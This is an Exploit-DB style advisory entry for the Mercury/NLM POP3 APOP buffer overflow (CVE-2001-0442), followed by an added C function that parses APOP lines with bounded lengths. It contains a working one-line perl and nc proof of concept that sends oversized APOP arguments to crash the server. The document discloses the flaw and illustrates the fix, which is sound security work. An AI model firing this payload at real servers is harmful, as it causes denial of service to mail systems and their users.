Exploit Mercury/NLM 1.4 - Buffer Overflow

Exploiter

18 Dec 2022
EDB-ID
20792
EDB verification
  1. Passed
Author
PRZEMYSLAW FRASUNEK
Vulnerability type
DOS
Platform
MULTIPLE
CVE
cve-2001-0442
Publication date
2001-04-21
Code:
source: https://www.securityfocus.com/bid/2641/info

Mercury MTA is a mail-transfer agent available for Novell NetWare and Windows NT. Novell versions of the Mercury POP3 server prior to 1.48 are vulnerable to a buffer overflow caused by inadequate string handling for the APOP authentication command.

Because the overflow occurs in an authentication command parser, unauthenticated remote users can trigger the overflow. It is unknown whether the overflow can lead to arbitrary code execution, but proof-of-concept code is available that will crash the NetWare server, requiring a reboot. 

perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc mercury_host 110
 
Source
www.exploit-db.com
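
A defensive illustration of the bounded string handling the advisory says the APOP parser lacked, as an added example (not Mercury's code and not part of the original post). The function name `parse_apop`, the status codes and the buffer layout are assumptions for illustration; the 40-character argument limit and the 32-character lower-case hex digest come from RFC 1939.

```c
#include <ctype.h>
#include <string.h>

#define POP3_ARG_MAX    40  /* RFC 1939: an argument is at most 40 characters */
#define APOP_DIGEST_LEN 32  /* RFC 1939: MD5 digest as lower-case hex */
enum apop_status { APOP_OK = 0, APOP_BAD_SYNTAX = -1, APOP_TOO_LONG = -2 };

/* Parse one received line "APOP <name> <digest>\r\n" of len bytes.
 * Every length is checked before any byte is copied. */
enum apop_status parse_apop(const char *line, size_t len,
                            char name[POP3_ARG_MAX + 1],
                            char digest[APOP_DIGEST_LEN + 1])
{
    /* Longest legal line: "APOP " + name + " " + digest + CRLF. */
    const size_t max_line = 5 + POP3_ARG_MAX + 1 + APOP_DIGEST_LEN + 2;
    if (len > max_line)
        return APOP_TOO_LONG;
    if (len < 7 || memcmp(line + len - 2, "\r\n", 2) != 0 || line[4] != ' ')
        return APOP_BAD_SYNTAX;
    for (size_t i = 0; i < 4; i++)          /* keyword is case-insensitive */
        if (toupper((unsigned char)line[i]) != "APOP"[i])
            return APOP_BAD_SYNTAX;

    const char *p = line + 5, *end = line + len - 2;
    const char *sp = memchr(p, ' ', (size_t)(end - p));
    if (sp == NULL || sp == p)
        return APOP_BAD_SYNTAX;
    size_t name_len = (size_t)(sp - p), dig_len = (size_t)(end - sp - 1);
    if (name_len > POP3_ARG_MAX)
        return APOP_TOO_LONG;
    if (dig_len != APOP_DIGEST_LEN)
        return APOP_BAD_SYNTAX;
    for (size_t i = 0; i < name_len; i++)   /* no control bytes or NULs in name */
        if (!isgraph((unsigned char)p[i]))
            return APOP_BAD_SYNTAX;
    for (size_t i = 0; i < dig_len; i++) {
        unsigned char c = (unsigned char)sp[1 + i];
        if (!(isdigit(c) || (c >= 'a' && c <= 'f')))
            return APOP_BAD_SYNTAX;
    }
    memcpy(name, p, name_len);
    name[name_len] = '\0';
    memcpy(digest, sp + 1, dig_len);
    digest[dig_len] = '\0';
    return APOP_OK;
}
```

A server would call this on each line read from the socket and answer `-ERR` on any non-zero status, so an over-length APOP line is rejected before it reaches a fixed-size buffer.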
